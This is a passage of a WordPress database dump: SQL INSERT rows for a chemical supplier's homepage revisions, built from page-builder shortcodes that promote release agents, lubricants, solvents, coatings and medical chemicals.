INSERT INTO `wp_posts` VALUES (91, 1, '2016-08-15 21:44:16', '2016-08-15 21:44:16', '', 'VAZO', '', 'inherit', 'open', 'closed', '', 'vazo-3', '', '', '2016-08-15 21:44:16', '2016-08-15 21:44:16', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VAZO-4.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (92, 1, '2016-08-15 21:44:48', '2016-08-15 21:44:48', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="24" animated="fadeIn" text_width="40%" text_align="bottom" text_pos="right" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="21" animated="fadeIn" text_width="40%" text_align="bottom" text_pos="right" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="200px" bg="25" animated="fadeIn" text_width="40%" text_align="bottom" text_pos="right" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="200px" bg="17" animated="fadeIn" text_width="40%" text_align="bottom" text_pos="right" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="250px" bg="23" animated="fadeIn" text_width="40%" text_align="bottom" text_pos="right" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="28" animated="fadeIn" text_width="40%" text_align="bottom" text_pos="right" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '35-autosave-v1', '', '', '2016-08-15 21:44:48', '2016-08-15 21:44:48', '', 35, 'https://132.148.10.86/wordpress/2016/08/15/35-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (93, 1, '2016-08-15 21:46:48', '2016-08-15 21:46:48', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="24" animated="fadeIn" text_width="40%" text_align="bottom" text_pos="right" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="21" animated="fadeIn" text_width="40%" text_align="bottom" text_pos="right" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="200px" bg="25" animated="fadeIn" text_width="40%" text_align="bottom" text_pos="right" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="200px" bg="17" animated="fadeIn" text_width="40%" text_align="bottom" text_pos="right" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="250px" bg="23" animated="fadeIn" text_width="40%" text_align="bottom" text_pos="right" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="28" animated="fadeIn" text_width="40%" text_align="bottom" text_pos="right" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 21:46:48', '2016-08-15 21:46:48', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (94, 1, '2016-08-15 21:51:28', '2016-08-15 21:51:28', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="200px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="200px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="250px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 21:51:28', '2016-08-15 21:51:28', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (95, 1, '2016-08-15 21:52:37', '2016-08-15 21:52:37', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="200px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="200px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="250px" bg="51" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 21:52:37', '2016-08-15 21:52:37', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (96, 1, '2016-08-15 21:53:56', '2016-08-15 21:53:56', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="200px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="200px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="250px" bg="39" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 21:53:56', '2016-08-15 21:53:56', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (97, 1, '2016-08-15 21:55:21', '2016-08-15 21:55:21', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="200px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="200px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="250px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 21:55:21', '2016-08-15 21:55:21', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (98, 1, '2016-08-15 21:56:45', '2016-08-15 21:56:45', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="240px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical 